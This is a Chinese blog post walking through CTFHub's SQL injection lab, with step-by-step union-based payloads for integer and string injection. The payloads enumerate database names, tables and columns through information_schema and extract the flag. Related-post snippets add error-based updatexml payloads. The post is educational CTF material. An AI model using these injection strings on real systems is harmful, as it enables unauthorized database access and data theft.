ctfhub技能树web--sql注入

已于 2023-05-15 21:25:17 修改
阅读量716 收藏 5
点赞数
文章标签: 数据库 mysql sql
于 2023-05-15 20:38:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64636395/article/details/130691577
版权

系列文章目录

ctfhub技能树web–信息泄露

ctfhub技能树web–密码口令

ctfhub技能树web–sql注入

ctfhub技能树web–xss

ctfhub技能树web–文件上传

ctfhub技能树web–RCE

ctfhub技能树web–SSRF

文章目录

前言

基本概念

  • SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。
  • 攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。
  • 如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。

提示:以下是本篇文章正文内容,下面案例可供参考

一、整数型注入(已知为数字型)

1.判断注入点

用1 and 1=1和1 and 1=2进行测试(若页面回显不一样,则证明该注入点存在sql injection漏洞)
在数据库中执行的语句:
SELECT * FROM uers WHERE id=1 and 1=1 LIMIT 1,0;
SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0;

2.判断列数

使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数

判断列数的原因:
要使用联合查询注入获取数据库的敏感数据库,前提是两个结果集合的列数相同,所以要判断...?id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询
在数据库中执行的语句:
SELECT * FROM uers WHERE id=1 order by 1 LIMIT 1,0;
SELECT * FROM uers WHERE id=1 order by 2 LIMIT 1,0;

以下为构造poc(轮子)过程
注意:要让union前一个语句不成立才能让union后的select语句的结果在前端显示出来

3.判断哪一列是报错点(哪一列会在前端显示的数据)

输入1 and 1=2 union select 1,2 (或者-1 union select 1,2)

4.从当前数据库(默认)获取当前数据库名、用户名等信息

输入1 and 1=2 union select 1,concat-ws('>',database(),version(),user())
在这里插入图片描述
扩展:
(1)可以用以下数据库函数获取相应的信息
* user() 当前用户名
* database() 当前数据库明
* version() 当前版本
(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息

5.从元数据库查出当前数据库的所有表名

输入1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
在这里插入图片描述

6.从元数据库查出当前数据库下的某个表下的所有列名

输入1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'
在这里插入图片描述

7.从当前数据库下的某个表中的查某一列的信息

输入1 and 1=1 union select 1,concat_ws('>',flag) from flag
在这里插入图片描述

二、字符型注入(已知为字符型型)

1.判断注入点

用1' and '1'='1和1' and '1'='2进行测试(若页面回显不一样,则证明该注入点存在sql injection漏洞)
在数据库中执行的语句:
SELECT * FROM uers WHERE id=‘1’ and ‘1’=‘1’ LIMIT 1,0;
SELECT * FROM uers WHERE id=‘1’ and ‘1’=‘2’ LIMIT 1,0;

2.判断列数

使用order by语句进行测试:1' order by 1 --+、1' order by 2 --+等,直到报错为止,报错的前一个数,为字段数
在这里插入图片描述
在这里插入图片描述

闭合后一个单引号的方法:
*注释符# --+ --等
*单引号’
此题在用判断列数时似乎只能用--+来注释掉后一个单引号
判断列数的原因:
要使用联合查询注入获取数据库的敏感数据库,前提是两个结果集合的列数相同,所以要判断...?id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询
在数据库中执行的语句:
SELECT * FROM uers WHERE id=‘1’ order by 1 --+’ LIMIT 1,0;
SELECT * FROM uers WHERE id=‘1’ order by 2 --+’ LIMIT 1,0;

//以下为构造poc(轮子)

3.判断哪一列是报错点(哪一列会再前端显示的数据)

输入1' and '1'='2' union select 1,2 --+
在这里插入图片描述

4.从当前数据库(默认)获取当前数据库名、用户名等信息

输入1' and '1'='2' union select 1,concat-ws('>',database(),user(),version()) --+
在这里插入图片描述

5.从元数据库查出当前数据库的所有表名

输入1' and '1'='2' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
在这里插入图片描述

6.从元数据库查出当前数据库下的某个表下的所有列名

输入1' and '1'='2' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' --+

7.从当前数据库下的某个表中的查某一列的信息

输入1' and '1'='1' union select 1,concat_ws('>',flag) from flag --+

xlx-小幺
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
CTFHub 技能树报错注入
qq_47271638的博客
05-28 477
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注; 假设为报错注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
CTFHUB-SQL注入
m_de_g的博客
08-11 5371
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTFHub SQL注入
最新发布
2302_81010533的博客
04-03 973
SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感信息、修改数据甚至控制整个数据库
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1808
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
CTFHub-sql注入
qq_60905276的博客
01-30 5626
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHub ---> SQL注入!!
huohaowen的博客
02-27 1198
今天大一下ctfhubsql注入的靶场!!!
CTFHUBsql注入(特详解)
小宇的web博客
06-16 2590
CTFHUBsql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞 加单引号 去掉‘加上and 1=1发现出现了回显 将1=1变为1=2,语句正确但是无法访问数据库 这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量 这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置 这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置 4.获取数据库库名 1)获取当前数据库库名,数据库的名称为
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3746
CTFHub sql注入 web mysql python脚本
CTFHub-SQL注入
yuqie的博客
06-13 851
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入学习天书
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
CTFHub 整数型SQL注入
Leon~博客
03-08 5630
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值